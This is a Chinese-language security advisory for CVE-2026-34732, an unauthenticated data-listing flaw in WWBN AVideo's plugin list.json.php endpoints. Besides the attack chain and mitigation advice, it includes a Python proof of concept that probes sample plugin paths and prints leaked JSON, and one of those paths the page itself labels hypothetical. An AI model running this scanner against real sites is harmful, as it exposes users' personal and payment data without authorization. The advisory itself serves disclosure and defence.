CVE-2026-34732: WWBN AVideo未授权信息泄露漏洞

漏洞信息

漏洞编号

CVE-2026-34732

漏洞类型

信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WWBN AVideo

漏洞概述

WWBN AVideo是一个开源视频平台。在26.0及更早版本中，其CreatePlugin模板的list.json.php文件未包含身份验证或授权检查。尽管相关模板需要管理员权限，但该模板未设置此保护。这导致21个插件端点存在未认证的数据列出漏洞，攻击者可无需登录直接访问敏感数据，包括用户PII、支付日志、IP地址、User-Agent及内部系统记录。

技术细节

该漏洞的根源在于WWBN AVideo框架中CreatePlugin代码生成器的设计疏忽。在生成插件后端接口时，list.json.php模板文件缺失了关键的权限控制逻辑。尽管同目录下的add.json.php和delete.json.php均正确实施了管理员权限验证，但list.json.php却遗漏了这一安全机制。由于AVideo平台上大量插件均基于此模板生成，这一单一缺陷导致了连锁反应，致使21个独立插件的数据接口暴露在公网。攻击者无需任何用户交互或身份凭证，仅需向特定的路径发送HTTP GET请求，服务器便会直接返回包含敏感信息的JSON数据。泄露的数据范围广泛，不仅包括用户姓名、邮箱等PII信息，还涉及支付交易详情、客户端IP地址、User-Agent等系统日志，严重侵犯了用户隐私并可能危及系统安全。

攻击链分析

STEP 1

侦察探测

攻击者识别运行WWBN AVideo的目标服务器，并通过页面源码或默认路径确认其版本在26.0及以下。

STEP 2

端点发现

攻击者根据已知的CreatePlugin模板结构，枚举目标站点上可能存在的插件路径，寻找list.json.php文件。

STEP 3

发起未授权请求

攻击者向发现的21个潜在端点发送未经身份验证的HTTP GET请求。

STEP 4

数据获取

服务器端因缺失权限校验，直接以JSON格式返回数据库中的敏感列表信息，攻击者将其下载并解析。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# PoC for CVE-2026-34732: WWBN AVideo Unauthenticated Data Listing
# This script checks for exposed list.json.php endpoints in plugins.

def check_vulnerability(target_url):
    # Common vulnerable endpoint patterns based on the CreatePlugin template
    # The exact list of 21 endpoints varies by installation, here are examples
    endpoints = [
        "/plugin/AVideoPluginExample/list.json.php",
        "/plugin/Marketplace/list.json.php",
        "/plugin/Meet/list.json.php",
        "/plugin/Social/login.json.php", # Hypothetical path based on structure
        "/plugin/Streamer/list.json.php"
    ]

    print(f"[*] Scanning target: {target_url}")

    for endpoint in endpoints:
        full_url = target_url.rstrip('/') + endpoint
        try:
            # Send unauthenticated GET request
            response = requests.get(full_url, timeout=5)
            
            if response.status_code == 200:
                try:
                    data = response.json()
                    print(f"[+] Potential sensitive data leak found at: {full_url}")
                    print(f"[+] Response preview: {str(data)[:200]}...")
                except ValueError:
                    # Not JSON, might be HTML error or redirect
                    pass
        except requests.RequestException as e:
            print(f"[-] Error connecting to {full_url}: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 cve_2026_34732_poc.py <http://target_url>")
        print("Example: python3 cve_2026_34732_poc.py http://localhost/avideo")
    else:
        check_vulnerability(sys.argv[1])

影响范围

WWBN AVideo <= 26.0

防御指南

临时缓解措施

由于目前尚无公开补丁，建议立即采取临时缓解措施：在Web服务器配置（如Apache .htaccess或Nginx配置）中，禁止直接访问 /plugin/*/list.json.php 路径，或者将这些路径限制为仅允许内网IP访问。同时，应检查服务器访问日志，确认是否已有针对这些端点的未授权访问记录。